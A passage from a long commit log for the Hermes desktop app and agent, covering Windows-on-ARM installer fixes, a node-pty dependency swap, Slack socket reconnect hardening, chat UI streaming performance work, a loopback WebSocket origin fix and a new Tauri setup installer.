when invoked from a native-ARM64 PowerShell host. WoW64 / emulated
x64 hosts (the default powershell.exe on Windows-on-ARM) saw
PROCESSOR_ARCHITECTURE=AMD64 and fell through to the x64 PortableGit
build, leaving ARM64 users on emulated Git for Windows.
- Test-Node: previously hardcoded the Node download to win-x64 on any
64-bit OS, so ARM64 users always got x64 Node under Prism emulation
even though Node ships an arm64 build for Windows. The winget
fallback now also passes --architecture arm64 on ARM64.
Python remains x86_64 by design: uv intentionally prefers
windows-x86_64 cpython on ARM64 hosts for ecosystem (wheel)
compatibility (see astral-sh/uv#19015).
* install.ps1: harden Install-SystemPackages against winget msstore failures
The previous winget invocation discarded stdout/stderr and trusted no
signal at all -- not the exit code (winget exits 0 even when it bails
"please specify --source"), not output (sent to Out-Null), not the
catch handler (winget returning 0 means no exception fires). The only
trust signal was a post-install Get-Command rg / Get-Command ffmpeg
check, which would also miss the package because %LOCALAPPDATA%\
Microsoft\WinGet\Links (where winget puts command aliases) is added to
PATH by AppExecutionAlias machinery only in fresh shells. End result on
machines where the msstore source has a cert problem (0x8a15005e --
common on Windows-on-ARM and some corporate networks): silent failure,
no log, no breadcrumb, and the user is told the install succeeded.
Specifically:
- Pin --source winget on every winget install call. Defeats the broken-
msstore-source path. We ship nothing from msstore so this is safe and
forward-compatible.
- Add --exact --id for a tighter package match.
- Capture each winget invocation's combined stdout/stderr + exit code to
%TEMP%\hermes-winget-<pkg>-<n>.log instead of Out-Null. On the happy
path the log is deleted after the post-install check confirms the
binary is on PATH; on failure the log is kept and its path is named in
a Write-Warn so the user has something to grep.
- Refresh PATH to include %LOCALAPPDATA%\Microsoft\WinGet\Links in
addition to the User/Machine env-var hives, so Get-Command sees newly-
installed winget aliases in the same process.
- No behavior change on the happy path. Same Write-Info/Success/Warn
cadence, same fallback order (winget -> choco -> scoop -> manual),
same $script:HasRipgrep / $script:HasFfmpeg outputs.
Verified end-to-end on a real Snapdragon ARM64 Windows host: ripgrep
uninstalled, stage re-run, [OK] ripgrep installed in 1.4s, ok:true.
* desktop: swap node-pty fork for upstream microsoft/node-pty 1.1.0
The previous dependency, @homebridge/node-pty-prebuilt-multiarch@0.13.1,
publishes no win32-arm64 prebuilds on its v0.13.x line, and its v0.14.x
betas (which do add an arm64 Windows build) ship no electron-vXXX-win32-
arm64 prebuilds at all -- so packaged Electron 40 builds (NMV 143) would
fail at runtime even on a successful npm install. Net effect: the
desktop's integrated terminal was unbuildable on Windows-on-ARM, in
both dev (npm install fails: 404 fetching the node-vXXX-win32-arm64
prebuilt) and packaged builds (no Electron-ABI prebuilt exists).
The homebridge fork was originally created because upstream node-pty
shipped no prebuilds at all. That hasn't been true since node-pty@1.0
(April 2024), which:
- bundles prebuilts for mac (arm64+x64) and Windows (arm64+x64) directly
inside the npm tarball -- no GitHub-Releases fetch, no missing-binary
failure mode
- uses N-API (node-addon-api) for ABI stability across Node and Electron
major versions, so the same pty.node binary loads under Node 22 (dev)
and Electron 40+ (packaged) without per-ABI rebuilds
- is what VS Code, Hyper, and Theia actually ship
API surface is identical (spawn / onData / onExit / write / resize /
kill) -- no call-site changes needed.
Specifically:
- apps/desktop/package.json: replace the @homebridge fork with
node-pty@1.1.0 (exact pin). Widen `asarUnpack` from `["**/*.node"]`
to also unpack `**/prebuilds/**`, because node-pty ships runtime-
execed helpers alongside its .node files (darwin spawn-helper has no
extension and would not be matched by `**/*.node`; conpty.dll,
OpenConsole.exe, winpty.dll, winpty-agent.exe on Windows are also
exec'd at runtime and cannot live inside asar).
- apps/desktop/electron/main.cjs: update both require() strings to
match the new package name and the new staged path under
resources/native-deps/node-pty/.
- apps/desktop/scripts/stage-native-deps.cjs: point at node_modules/
node-pty. node-pty's prebuilts live under prebuilds/<plat>-<arch>/
(not build/Release/), so update the include glob to copy that dir.
Per-arch staging keeps the resource bundle small (target arch comes
from npm_config_arch when electron-builder cross-builds, else
process.arch). Explicitly enumerate file types in the prebuilds glob
so the ~25 MB of .pdb debug symbols that prebuild-install bundles
for Windows crash analysis don't bloat the installer (29 MB -> 2.6 MB
staged on win32-arm64). Re-assert +x on the darwin spawn-helper
defensively, since a stripped mode bit would manifest as a silent
ENOENT at first pty.spawn().
- apps/desktop/scripts/test-desktop.mjs: update expectedNativeDepPaths()
and its assertion site to look at prebuilds/<plat>-<arch>/ instead of
build/Release/. Add an explicit spawn-helper-exists check on darwin
so a regression in the asarUnpack glob would fail loudly in CI rather
than at first PTY spawn.
Trade-off: Linux end-users lose prebuilts and fall back to building
node-pty from source on `npm install`. Acceptable because Hermes
ships no Linux desktop builds (desktop-release.yml matrix is mac + win
only, package.json declares no `linux` target), and Linux developers
hacking on the desktop already need a C++ toolchain for the rest of
the stack.
Verified on Windows 11 ARM64 (Snapdragon):
npm install -> exit 0
node -e "require('node-pty').spawn(...)" round-trip -> OK
stage-native-deps -> 27 files, 2.6 MB
load from staged tree (simulates packaged fallback) -> ConPTY
round-trip OK
* desktop+gateway: harden Slack socket recovery and Windows restart dedupe (#28873)
* desktop+gateway: harden Slack socket recovery and Windows restart dedupe
Fix Slack Socket Mode reliability by adding a watchdog/reconnect path so silent socket task drops no longer leave the adapter stuck. Harden Windows gateway lifecycle by avoiding desktop-binary path collisions, making gateway PID scans case/extension tolerant, and reusing in-flight restart actions to prevent duplicate gateway spawns.
* test(slack): add Socket Mode watchdog/reconnect behavioural coverage
Drive the new Slack Socket Mode self-healing logic through a fake AsyncSocketModeHandler so we can simulate the P0 silent-hang failure mode (task exit, transport disconnected, intentional shutdown, concurrent reconnect attempts) without touching real Slack.
* fix(slack,desktop): address Copilot review on watchdog races and path normalization
- connect(): explicitly cancel + await the prior socket watchdog before flipping _running, so an old monitor cannot exit between teardown and respawn (Copilot #1)
- _socket_watchdog_loop: wrap the body in try/except + add a done-callback that respawns on unexpected crash, so a transient bug cannot permanently disable self-healing (Copilot #2)
- normalizeExecutablePathForCompare: use the resolved path for realpathSync so non-string inputs cannot leak through (Copilot #3)
- Add tests for crash-recovery and atomic watchdog replacement across reconnects
* fix(slack): tighten connect() error path and clarify watchdog test intent
Address Copilot review round 2.
- connect(): wrap _start_socket_mode_handler/_ensure_socket_watchdog in a focused try/except so any failure rolls back partially-started handler/task state and leaves _running=False, ensuring the platform lock is always released by the outer finally
- Defer _running=True until after the handler is actually started so the watchdog observes a live socket task immediately and never spins against a half-built adapter
- Rename test_watchdog_self_restarts_after_unexpected_crash to test_watchdog_cancellation_does_not_respawn (matches what it actually asserts) and add test_watchdog_unexpected_exit_respawns_via_done_callback that drives a real RuntimeError through _on_socket_watchdog_done and verifies a fresh task replaces the crashed one
* fix(web_server): serialize action spawn check+store under a threading lock
Address Copilot review round 3.
FastAPI runs sync handlers on its threadpool, so two near-simultaneous /api/gateway/restart (or /api/hermes/update) requests could both observe "no live process" in _spawn_hermes_action's poll-based dedupe and double-spawn. Add a module-level _ACTION_SPAWN_LOCK around the entire check + Popen + _ACTION_PROCS store sequence so the dedupe is atomic across threads.
* fix: address Copilot review round 4
- slack.disconnect(): mirror connect()'s defensive cleanup — catch the broad Exception path on watchdog await so handler shutdown and lock release still run if the watchdog raised before cancellation took effect
- web_server._spawn_hermes_action: wrap subprocess.Popen in try/except so a missing executable / permission error closes the log file handle, writes a failure marker, and re-raises instead of leaking a file descriptor
- gateway._scan_gateway_pids: drop the over-broad "hermes.exe --profile" / "hermes.exe -p" patterns that would match any Hermes CLI subcommand using a profile flag (e.g. `hermes.exe --profile foo dashboard`); rely on the "hermes.exe gateway" + "hermes-gateway.exe" tokens instead
- tests: tighten _fake_create_task to assert coroutine input and return a real asyncio.Task that stays pending until pytest teardown, and update the three callsites whose mocked AsyncSocketModeHandler.start_async returned a non-coroutine value
* fix(slack): reset multi-workspace state on reconnect
Address Copilot review round 5.
connect() is reentrant (gateway restart, in-process reconnect), but it was leaving _bot_user_id / _team_clients / _team_bot_user_ids populated from the previous session. A reconnect that rotated the primary token or dropped a workspace would silently keep the stale bot user id and stale workspace client maps, leading to dispatch against gone workspaces.
Clear these three pieces of state right after _stop_socket_mode_handler() and before the auth_test loop, then let the loop repopulate from the current tokens. Add test_reconnect_refreshes_multi_workspace_state to lock it in.
* nix: package apps/desktop as .#desktop (#28964)
Adds nix/desktop.nix building the Electron renderer with buildNpmPackage
and wrapping nixpkgs' electron binary. Reuses .#default by setting
HERMES_DESKTOP_HERMES to its hermes binary, so the desktop's resolver
picks up the fully-wired nix hermes (venv, bundled skills/plugins,
runtime PATH) without reimplementing agent resolution.
- nix/desktop.nix: renderer + electron wrapper
- nix/hermes-agent.nix: finalAttrs form, exposes hermesDesktop in passthru
- nix/packages.nix: exposes .#desktop + adds to fix-lockfiles
- apps/desktop/package-lock.json: standalone hermetic lockfile
nix build .#desktop && nix run .#desktop both clean.
* fix(desktop): probe steps 4 & 5 of resolveHermesBackend before trusting
A user-reported failure on Windows-on-ARM: a pre-installed Python 3.13
on PATH makes findSystemPython() succeed, so resolveHermesBackend
returns a backend pointing at it -- but hermes_cli isn't in that
interpreter's site-packages. The spawn dies with ModuleNotFoundError
and the user sees a dead GUI instead of the first-launch installer.
Same shape can hit step 4 (existing `hermes` on PATH) when a stale
shim survives a partial uninstall.
Add cheap exit-code probes -- `python -c "import hermes_cli"` for
step 5, `<hermes> --version` for step 4 -- and fall through to step 6
(bootstrap-needed) on failure. install.ps1 then runs as if on a clean
box and the venv gets built.
Probes live in a standalone electron/backend-probes.cjs module so they
can be unit-tested with node --test, same pattern as bootstrap-platform.cjs
and hardening.cjs. New test file wired into test:desktop:platforms.
* test(desktop): allow `node-pty` bare-require in packaged entrypoints
Pre-existing failure on bb/gui since c858484b4 swapped the node-pty
fork for upstream microsoft/node-pty 1.1.0. main.cjs intentionally
bare-requires node-pty (it's hoisted by workspace dedup in dev, and
staged to resources/native-deps via scripts/stage-native-deps.cjs +
extraResources for packaged builds, with a try/catch fallback at
line ~38). The allowlist hadn't been updated to match -- same shape
as `electron`, which was already allowed.
* chore(deps): refresh root lockfile for dashboard @nous-research/ui 0.14.0
apps/dashboard/package.json was bumped to @nous-research/ui 0.14.0 (+
flag-icons ^7.5.0, motion ^12.38.0) but the root package-lock.json was
never refreshed. Running `npm install` from the repo root now
materialises 0.14.0's transitive closure (launder, bumps for
@nanostores/react, nanostores, sanitize-html, tailwind-merge).
No code changes; purely a lockfile catch-up so fresh checkouts on bb/gui
get a working dashboard install.
* chore(desktop): bump version to 0.0.1
First non-placeholder version so electron-builder's artifactName template
produces `Hermes-0.0.1-win-x64.exe` instead of the obviously-unreleased
`Hermes-0.0.0-...`. No release process yet; this just stops the artifact
filename from telling users "you got a debug build."
Bumped in three slots that all carry the desktop app's version:
- apps/desktop/package.json (source of truth)
- apps/desktop/package-lock.json (per-app lockfile, kept for CI parity)
- root package-lock.json's apps/desktop workspace entry
Identity-of-build for first-launch bootstrap continues to come from
build/install-stamp.json (commit SHA + builtAt), unchanged.
* fix: fs icon color
* perf(desktop): cut per-keystroke layout + listener churn in chat composer
Empirical work via CDP harnesses under apps/desktop/scripts/ (see
profile-typing-lag.md):
jsListeners growth (per round of 200 chars + GC):
before: +35 (verified leak — listeners stuck after 1st trigger popover use)
after: +0
Four narrow edits in src/app/chat/composer/index.tsx:
1. Drop the per-keystroke `editorRef.current.scrollHeight` read used to
decide composer expansion. Replace with `draft.length > 60` heuristic;
the existing ResizeObserver still catches edge cases. `scrollHeight`
is a forced-layout call and was firing on every char until the first
wrap.
2. Bucket measured composer height to 8px before writing
`--composer-measured-height` / `--composer-surface-measured-height`
on `documentElement`. Without this, the editor grows ~1px per char,
setProperty fires every keystroke, computed style is invalidated tree-
wide.
3. Remove the dead `$composerDraft` two-way sync. Nothing outside the
composer subscribed to that atom (verified via grep). Two useEffects
on `[draft]` were pushing draft→atom and atom→aui per keystroke for
no consumer. Also drop the per-keystroke
`reconcileComposerTerminalSelections` call; it was pruning stale
labels for `terminalContextBlocksFromDraft`, but that helper already
ignores labels not in the current submitted text, so pruning per
keystroke was just bookkeeping.
4. `refreshTrigger` fast-bails when the draft contains neither `@` nor
`/`. Previously `textBeforeCaret(editor)` ran on every input/keyup
regardless; `range.toString()` inside is O(n) over draft length.
Synthetic typing latency p50/p90/p99 is similar before vs after on a
freshly-loaded session (Blink can already handle ~30cps typing into a
contentEditable on its own); the real win is the listener leak being
gone and the global computed-style invalidations dropping ~8× when the
composer is sitting at a fixed height row.
The `Enter → stall` follow-up (see profile-typing-lag.md §"Submit /
TTFT stall") is unmeasured here — needs a throwaway session because
the harness fires a real prompt. Not blocking this commit.
* perf(desktop): cut FadeText forced layouts during streaming
The slowest user-felt path is typing into the composer while the
assistant is streaming. Profile (scripts/profile-under-stream.mjs):
FadeText measureOverflow self time: 35.8 ms → 18.1 ms (-50%)
total active CPU during 7s window: ~150 ms → ~50 ms
Two changes in src/components/ui/fade-text.tsx:
1. Drop the `useEffect([children])` that re-ran `measureOverflow`
(reads scrollWidth + clientWidth — forced layout) on every parent
re-render. `useResizeObserver` already fires the same callback on
mount and whenever the host span's box size changes; that covers
the only case where overflow state can legitimately change. The
previous explicit useEffect was a forced-layout flush on every
parent render, which during streaming meant every token tick.
2. Wrap the component in `memo` with a custom comparator that
short-circuits the entire render when scalar string `children` and
the className/fadeWidth/style props are unchanged. The hot path
was tool-fallback's title chips being re-rendered by parent
streaming updates even though their text was stable; memo+
comparator skips that.
Also adds two harness scripts under apps/desktop/scripts/:
- latency-under-stream.mjs (key→paint latency while a turn streams)
- profile-under-stream.mjs (CPU profile while a turn streams)
Updates profile-typing-lag.md with the streaming numbers and confirms
the Enter→paint submit path is already fast (≤320ms on the populated
session; the 2s "stall after Enter" the user noticed once was a
one-time cold-start, not reproducible at the UI layer).
I'd guess the felt jank in real use is fast-burst typing during a
long-form streaming reply (code blocks + markdown lists multiply the
per-token render cost). The CPU savings here scale linearly with
token volume.
* chore(desktop): drop diag scratch scripts no longer needed
* docs(desktop): correct leak-typing numbers on a real session
Re-ran the leak harness on a populated session (Phaser thread) for both
unpatched and patched builds. The original 'listener leak' was transient
warm-up cost, not a steady-state leak — both versions show 0 listener
growth/round in steady state.
The load-bearing number is forced layouts per character:
unpatched (HEAD~2): 7.02 layouts/char
patched (HEAD): 2.35 layouts/char (3× fewer)
The patches reduce per-char forced-layout work to Blink's natural floor.
Document node count and heap are flat in both builds.
* perf(desktop): fix "Enter jumps up" on long threads
User reported: after pressing Enter on a long thread, the view jumps up
— the just-submitted message disappears below the fold. Confirmed via
apps/desktop/scripts/measure-jump.mjs:
before: distFromBottom 0 → 49.5px, sticks there permanently
after: distFromBottom 0 → ~0 (worst case 4px for one frame)
Root cause in useThreadScrollAnchor (thread-virtualizer.tsx):
1. The sticky-bottom logic disarmed on any scroll event where
`scrollTop < lastTopRef.current`. That check can't distinguish a
user scrolling up from a programmatic `pinToBottom` write that
the browser clamped short of bottom (because content also grew in
the same frame, so `scrollTop = scrollHeight` lands at
`scrollHeight - clientHeight` for the OLD scrollHeight, which is
now below the NEW scrollHeight). Result: sticky-bottom disarmed
permanently on the user's first submit.
2. There was no synchronous pin tied to React's commit phase. By the
time the ResizeObserver fired and re-pinned, the user had already
seen ~50ms of "message below the fold" — visually that reads as the
view jumping up.
Fix:
- `programmaticScrollPendingRef` counter tracks scroll events we
expect to be ours (one per `pinToBottom` write). The scroll handler
skips the disarm check when consuming a pending tick, keeps the
arm bit true, and re-pins synchronously if the browser clamped us
short of bottom. A depth cap (8) breaks runaway loops in
pathological streaming-burst layouts.
- `useLayoutEffect` on `groupCount` increase pins BEFORE the browser
paints, eliminating the visible ~50ms window between optimistic
user-message insert and the RO/scroll-event chain firing.
Verified on the long Cloud Shadows thread (7-8 turns, ~11k px tall):
all three repro runs now hold within 0–4 px of bottom across the
post-Enter transition. Submit latency unchanged (paint 77–107 ms),
streaming-typing latency unchanged.
Also adds three debug harnesses:
- measure-jump.mjs — sample thread scroll across Enter
- probe-thread.mjs — dump current thread / scroll state
- diag-jump.mjs — intercept scrollTop + RO + mutations across Enter
* perf(desktop): rate-limit thread auto-pin during streaming
Follow-up to the Enter-jump fix. The first version did a synchronous
re-pin loop inside the on-scroll handler when the browser clamped our
`scrollTop = scrollHeight` write short of the new bottom; that gave a
tight 4 px visible jump on Enter, but during streaming the
ResizeObserver fires many times per second as content grows, and each
RO callback re-entered the pin loop. CPU profile showed
`Virtualizer.getMaxScrollOffset` climbing to 22 ms self over a typing-
during-streaming window — the sync re-pin path was paying tanstack-
virtual's recompute cost ~3× per token.
Re-architect:
- RO callback coalesces to one pin per animation frame. Streaming-rate
RO bursts now cost the same as a single per-frame pin.
- The on-scroll programmatic-counter guard remains (it's what prevents
the false-disarm bug when the browser clamps a write). It no longer
does sync re-pins; the next RO/rAF will catch up.
- The useLayoutEffect on groupCount (the path that fires on user
submit / new turn arrival) ALSO schedules one rAF pin in addition to
the synchronous pin. This catches the case where React mounts the
new message in a second commit (after our layout effect ran), which
grows scrollHeight again. Two pins instead of a tight loop, paid only
once per turn change.
Net effect on the Cloud Shadows long thread:
enter-jump transient: 12–20 px for 1 frame (was 49 px permanent)
CPU during stream+type: `getMaxScrollOffset` dropped out of top-5
self-time list
typing-during-stream: p50 ~10 ms paint, p99 ~20 ms (1 frame),
occasional 40 ms+ outliers during burst
token arrivals
Also adds scripts/profile-long-stream.mjs: 20-second streaming profile
with per-500ms FPS histogram + content-length tracking, so we can see
whether streaming render cost grows with message length (it doesn't —
sustained 60 fps).
* perf(desktop): use textContent for trigger precondition
Replace composerPlainText() call inside refreshTrigger's no-trigger
fast-bail with a textContent check. textContent is a browser-native
flat traversal; composerPlainText walks recursively with chip-aware
logic. We only need to know if @ or / appears; either way the trigger
char will be in textContent because chips contain @ in their refText.
Profile shows composerPlainText was ~18ms self over a 12s typing-during-
stream window, called from refreshTrigger on every keystroke. Most of
that was the precondition check (the trigger detection path is the
slow path but only runs when a trigger char is present).
* Revert "perf(desktop): use textContent for trigger precondition"
This reverts commit a6a78ff08a31129a3a47fa55aca260d93af913a5.
* Revert "perf(desktop): cut FadeText forced layouts during streaming"
This reverts commit 88e7d7537cdab87200405edf298e38cb37e0a950.
* Revert "perf(desktop): cut per-keystroke layout + listener churn in chat composer"
This reverts commit bff1b3261d18a2427ac6c345c99f8312728346dd.
* Revert "Revert "perf(desktop): cut per-keystroke layout + listener churn in chat composer""
This reverts commit b7b378e3a43f94b9f4a1a34155707c6301c0fd87.
* Revert "Revert "perf(desktop): use textContent for trigger precondition""
This reverts commit 0739588f4896902f7f0d4ded8b5eaeb92bfdf042.
* chore(desktop): synthetic-stream perf harness + scripts
Drops the React `<Profiler>` approach (no-op because Vite is currently
serving the production React build) in favor of an externally-observable
measurement stack: rAF frame intervals, `PerformanceObserver({entryTypes:
['longtask']})`, and a `MutationObserver` on the live streaming message.
Adds a synthetic stream driver — `window.__PERF_DRIVE__.stream({...})` —
that pushes tokens through the live `$messages` atom at a controlled rate,
so the assistant-ui runtime, incremental repository, and Streamdown
markdown pipeline see the same workload they'd see during a real LLM
stream, without the LLM cost.
The driver lives in `src/app/chat/perf-probe.tsx`; `main.tsx` side-imports
it under `import.meta.env.MODE !== 'production'` so it tree-shakes out of
prod builds. (Using `MODE` rather than `DEV` because our Vite setup
currently reports `DEV=false` even under `vite dev` — see the dev-build
note in `profile-typing-lag.md`.)
Scripts:
- measure-synthetic-stream.mjs drive synthetic + record frame/longtask/mutation
- profile-synth-stream.mjs CPU profile + top self-time during synthetic
- measure-real-stream.mjs same harness, real LLM stream
- profile-real-stream.mjs CPU profile bracketing the real stream window
- eval.mjs / reload.mjs small CDP helpers
A real-LLM measurement on Cloud Shadows (gpt-4o-mini, 39 s window) showed
12 longtasks in the same 75-127 ms range the synthetic predicted, so the
synthetic is a faithful proxy.
* perf(desktop): memo FadeText so it skips re-renders when text unchanged
FadeText is used 110+ times inside `tool-fallback.tsx` on a tool-heavy
thread. During streaming each parent re-render previously triggered the
component's `useEffect([children])`, which forced a `scrollWidth` layout
read even when the title text was unchanged. The `useResizeObserver` was
already covering the genuine resize case, so that effect was strictly
redundant work.
Drops the effect and wraps the component in `React.memo` with a custom
comparator that field-compares `className`, `fadeWidth`, and `style`,
plus identity-compares `children` (scalar fast-path; correct for JSX
nodes too since a new node should force a re-render).
Verified via temporary render counter on the 34 MB
`session_20260514_215353_fe0ac8` thread (110 FadeText instances): a
2 s synthetic stream went from ~11k FadeText render calls to 122 —
roughly one render per truly-new instance instead of one per parent
commit per instance.
Doesn't move the longtask needle on its own (Streamdown's markdown
re-parse dwarfs it) but eliminates a steady CPU floor and a class of
forced layouts during streaming. Profile-typing-lag.md documents the
full investigation, including the remaining Streamdown cost as the
real source of the perceived "5 fps moment" hitches.
* perf(desktop): memoize MarkdownText plugins to stop churning Streamdown
The inline `plugins={{ math: mathPlugin, ...(isStreaming ? {} : { code }) }}`
on `<StreamdownTextPrimitive>` constructed a new object literal on every
parent render. That broke `<Streamdown>`'s outer memo and forced its
internal `rehypePlugins` / `remarkPlugins` array useMemos to rebuild,
which propagates a new identity into every `<Block>` and defeats Block's
memoization for stable historical blocks.
After memoizing on `[isStreaming]` (the only real dimension of variance),
CPU profile during a 5 s synthetic stream on the 34 MB session shows
`parser` self-time dropping out of the top 10, `compile` cut roughly in
half, and `bn$1` / `m$1` (micromark internals) leaving the top entries.
Doesn't move the visible longtask count on its own — Streamdown's
per-Block parse cost still dominates whenever the last block's content
changes — but it removes a class of unnecessary re-parses for historical
blocks during streaming. See `scripts/profile-typing-lag.md` for the
full investigation.
* perf(desktop): floor assistant-text flush gap to 33ms for predictable batching
`scheduleDeltaFlush` previously coalesced via `requestAnimationFrame`
only. The "at most one flush per frame" guarantee that gives you is fine
for fast streams (>~80 tok/sec) where multiple tokens arrive within a
single frame, but breaks down at typical LLM token rates (30-80 tok/sec)
where each token arrives slower than the rAF cadence and triggers its
own React commit + Streamdown markdown re-parse.
Track `lastFlushAt` and require at least 33 ms between two flushes.
React 18+ auto-batching probabilistically already collapsed some of
these, but the floor makes it deterministic.
A/B on the 34 MB session, 300 tokens at 50 tok/sec (markdown chunks):
| | avgFps | p99 frame | LTs / 5 s | max LT |
|---|---|---|---|---|
| no floor (current rAF) | 54.0 | 38 ms | 2.0 | 145 ms |
| 33 ms floor (this PR) | 54.3 | 41 ms | 1.7 | 110 ms |
`inter-mutation` p50 also tightens from 22-28 ms to a clean 33 ms,
which is the expected signature of a deterministic floor. Doesn't fully
solve the user's perceived hitches — Streamdown's per-Block parse cost
when the last block grows past ~2 k chars is still the elephant — but
it consistently shaves the worst-case longtask and makes the streaming
cadence visibly steadier.
Also threads a matching `flushMinMs` option through the synthetic
stream driver in `perf-probe.tsx` + `scripts/measure-synthetic-stream.mjs`
so the harness can A/B both regimes without spending LLM credits.
See `scripts/profile-typing-lag.md` for the full investigation.
* perf(desktop): useDeferredValue for streaming markdown so parses don't block input
Streamdown's per-Block parse cost grows with the live tail's length and
is unavoidable inside the block-memo pattern (industry standard, see
findings doc). The fix is to stop having that work block the main thread.
`<DeferStreamingText>` is a 12-line wrapper that reads message-part state
via `useMessagePartText`, runs it through `useDeferredValue`, and
re-publishes via assistant-ui's `<TextMessagePartProvider>`. The inner
`<StreamdownTextPrimitive>` reads the deferred value through the normal
`useMessagePartText` hook — no fork, no internal-path imports, fully on
assistant-ui's public API. React's concurrent scheduler then:
- abandons in-flight deferred renders when a newer token arrives, so
intermediate states get skipped under fast streams
- deprioritises the markdown render when the main thread has urgent
work (typing, scroll), so input stays responsive even while a
100ms parse is queued
Streamdown already uses `useTransition` for its block-array setState;
this lifts the deferral up to the consumer boundary so it covers the
whole pipeline (preprocess → split → repair → parse → render).
A/B on the 34 MB session, 300 tokens at 50 tok/sec, markdown chunks
(four trials each, with the 33ms flush throttle on for both):
| | avgFps | p99 frame | LTs/5s | max LT | typing-while-stream p95 |
|---|---|---|---|---|---|
| pre | 54.3 | 41 ms | 1.7 | 110 ms | ~17 ms |
| post | 58.5 | 31 ms | 2.0 | 117 ms | 14-18 ms |
Longtask count + max LT unchanged — useDeferredValue doesn't reduce
CPU, only its priority. The avgFps lift and p99 frame drop are the
proof that the existing CPU is no longer blocking 60 fps cadence. One
clean run logged MUTATIONS=0 — React skipped every intermediate text
state and only committed the final one (textbook deferred-value
behaviour).
The actually-reduce-CPU path is replacing the parser with a state
machine like Flowdown — left for a future PR; see
`apps/desktop/scripts/profile-typing-lag.md` for the full investigation.
* feat(desktop): add hermes gui launcher
* feat(desktop): launch packaged gui builds by default
* bump gui version to 0.0.2
* fix(dashboard): allow file:// origin on loopback WS + diagnostic logging
Upstream commit 2e66eefbc ("fix(dashboard): validate WebSocket Host
and Origin") added a WebSocket Host/Origin guard to block DNS
rebinding against the dashboard. The guard rejects any Origin whose
scheme is not http/https or whose netloc is empty — which includes
Electron's renderer Origin: file:// when the desktop app loads its
bundle from disk in production mode.
That makes the bb/gui Electron desktop unable to open the gateway
WebSocket against the embedded backend on Windows / macOS prod
builds. The renderer reports "Desktop boot failed" and the backend
logs:
WARNING hermes_cli.web_server: gateway-ws reject
peer=127.0.0.1:NNNN reason=non_loopback_or_bad_origin
bound_host=127.0.0.1 close_code=4403
DNS-rebinding requires a DNS-resolvable hostname; file:// has no
host component and therefore cannot be the attack vector this guard
exists to block. When bound to a loopback interface (127.0.0.1 /
::1 / localhost), accept file:// origins so desktop wrappers can
attach. Non-loopback binds (operator opted into network exposure)
keep rejecting file:// — the loose policy doesn't apply.
Also adds per-reason diagnostic logging in
_ws_host_origin_is_allowed, so future ws-guard rejections name the
specific clause that fired (bad_host / bad_origin_scheme /
origin_host_mismatch) instead of the opaque
"non_loopback_or_bad_origin" surfaced at the call site.
Verified against tests/hermes_cli/test_web_server_host_header.py
(all 11 upstream tests still pass) and hand-tested by opening the
bb/gui Electron desktop dev build against the patched backend.
* fix(tui_gateway): restore _content_display_text helper
Bb/gui had dropped the helper but the orchestrator code merged from main
still calls it (_inflight_text, _message_preview). Re-add the definition
verbatim from main so session.create / _start_inflight_turn don't crash
with NameError on first prompt submit.
* fix(tui-gateway): restore _content_display_text helper lost in main merge
The May 27 merge of origin/main into bb/gui re-introduced two callers of
_content_display_text (in _inflight_text and _history_to_messages) but
dropped the helper definition itself, leaving an unresolved reference.
NameError fires on every user message via _start_inflight_turn ->
_inflight_text, taking down both the TUI and the desktop (which share
this gateway backend) the moment input is dispatched.
Restores the helper verbatim from main (commit 36c99af37) -- pure
structured-content text extractor, no other dependencies.
* fix(telegram): import Set for _dm_topic_chat_ids annotation
self._dm_topic_chat_ids: Set[str] = {...} at line 460 references Set
but only Dict, List, Optional, Any are imported from typing. The file
has no 'from __future__ import annotations', so the annotation is
evaluated at runtime and raises NameError on TelegramAdapter
construction.
* fix(setup): drop shadowing inner importlib.util re-imports
_print_setup_summary and _setup_tts_provider each had 'import
importlib.util' inside a try: block nested deeper in the function
body. Python flips importlib to function-local for the whole scope,
so earlier references in the same function (the neutts branches at
lines 493 / 1109) hit UnboundLocalError before the late import can
run.
The top-of-module 'import importlib.util' at line 14 already covers
both call sites, so dropping the redundant inner imports restores
the intended behavior.
* feat(install.ps1): add -IncludeDesktop switch + Stage-Desktop
The new Hermes-Setup.exe (Tauri bootstrap installer) passes -IncludeDesktop
so users who install via the GUI end up with a launchable Hermes.exe at
apps/desktop/release/<os>-unpacked/. Existing flows are unchanged:
* The 'irm install.ps1 | iex' CLI one-liner omits the flag — terminal
users don't need a prebuilt desktop binary; 'hermes desktop' builds
on demand.
* The Electron desktop's bootstrap-runner.cjs also omits the flag —
rebuilding apps/desktop from inside a running Hermes.exe would try
to overwrite the live binary on disk and fail.
Stage-Desktop runs after Stage-NodeDeps so workspace npm is already
installed when electron-builder fires. It does:
1. 'npm install' at repo root so apps/* workspaces resolve their deps
(Electron itself arrives via npm here, ~150MB)
2. 'npm run pack' in apps/desktop (tsc + vite + electron-builder --dir)
3. Probes apps/desktop/release/{win-unpacked,win-arm64-unpacked}/Hermes.exe
The --dir mode produces an unpacked launchable binary without an NSIS/MSI
installer artifact — we don't need one because Hermes-Setup.exe spawns the
unpacked binary directly via launch_hermes_desktop.
* feat(installer): Tauri bootstrap installer for first-time onboarding
Hermes-Setup.exe is a small signed Rust+Tauri binary that drives
scripts/install.ps1 stage-by-stage with a native UI matching the
desktop's design language. Replaces the chicken-and-egg pattern of
shipping a 200MB Electron app whose first launch existed only to
run install.ps1.
The architecture:
Rust backend (src-tauri/):
bootstrap.rs orchestrator -- Tauri commands, stage iteration
install_script.rs resolve install.ps1 (dev checkout, cache, GitHub raw)
powershell.rs spawn powershell, line-stream stdout/stderr, parse JSON
events.rs BootstrapEvent types -- mirror bootstrap-runner.cjs
paths.rs HERMES_HOME resolution + tracing log setup
build.rs bakes BUILD_PIN_COMMIT / BUILD_PIN_BRANCH from
'git rev-parse HEAD' at compile time
React frontend (src/):
Tauri webview rendering 4 screens (welcome / progress / success /
failure), driven by nanostores subscribing to the Rust event stream.
Visual layer reuses the desktop's styles.css wholesale via @import
so the installer and desktop never drift visually.
Distribution:
targets = ['app', 'dmg', 'appimage'] -- no NSIS/MSI wrapper. The
raw target/release/Hermes-Setup.exe IS the artifact on Windows;
.dmg + .app on macOS; AppImage on Linux. One file, double-click,
no installer-installing-an-installer pattern.
Compile-time pinning:
build.rs reads 'git rev-parse HEAD' and emits
cargo:rustc-env=BUILD_PIN_COMMIT=<sha> + BUILD_PIN_BRANCH=<branch>.
bootstrap.rs's option_env!() picks these up so the binary fetches
install.ps1 from the exact SHA it was tested against. CI / release
builds can override via HERMES_BUILD_PIN_COMMIT env var.
Windows manifest:
hermes-setup.manifest declares level='asInvoker' so the
productName 'Hermes Setup' doesn't trip Windows's installer-
